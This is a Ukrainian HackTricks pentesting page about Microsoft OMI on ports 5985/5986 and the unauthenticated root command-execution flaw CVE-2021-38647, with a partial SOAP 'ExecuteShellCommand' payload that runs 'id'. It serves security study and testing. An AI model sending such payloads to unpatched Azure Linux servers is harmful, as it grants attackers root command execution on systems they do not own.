hacktricks/network-services-pentesting/5985-5986-pentesting-omi.md
2024-03-29 19:49:46 +01:00

5.8 KiB
Raw Blame History

5985,5986 - Тестування на проникнення OMI

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Основна інформація

OMI представлений як відкрите програмне забезпечення від Microsoft, призначене для віддаленого управління конфігурацією. Це особливо важливо для Linux-серверів на Azure, які використовують такі служби, як:

  • Azure Automation
  • Azure Automatic Update
  • Azure Operations Management Suite
  • Azure Log Analytics
  • Azure Configuration Management
  • Azure Diagnostics

Процес omiengine запускається та прослуховує всі інтерфейси як root, коли ці служби активовані.

Використовуються стандартні порти 5985 (http) та 5986 (https).

Вразливість CVE-2021-38647

Як було помічено 16 вересня, Linux-сервери, розгорнуті в Azure з вказаними службами, є вразливими через вразливу версію OMI. Ця вразливість полягає в обробці сервером OMI повідомлень через кінець /wsman без необхідності заголовка аутентифікації, неправильно авторизуючи клієнта.

Атакувальник може використати це, надсилаючи SOAP-пакет "ExecuteShellCommand" без заголовка аутентифікації, змушуючи сервер виконувати команди з правами root.

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
...
<s:Body>
<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:command>id</p:command>
<p:timeout>0</p:timeout>
</p:ExecuteShellCommand_INPUT>
</s:Body>
</s:Envelope>

Для отримання додаткової інформації про цей CVE перевірте це.

Посилання

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!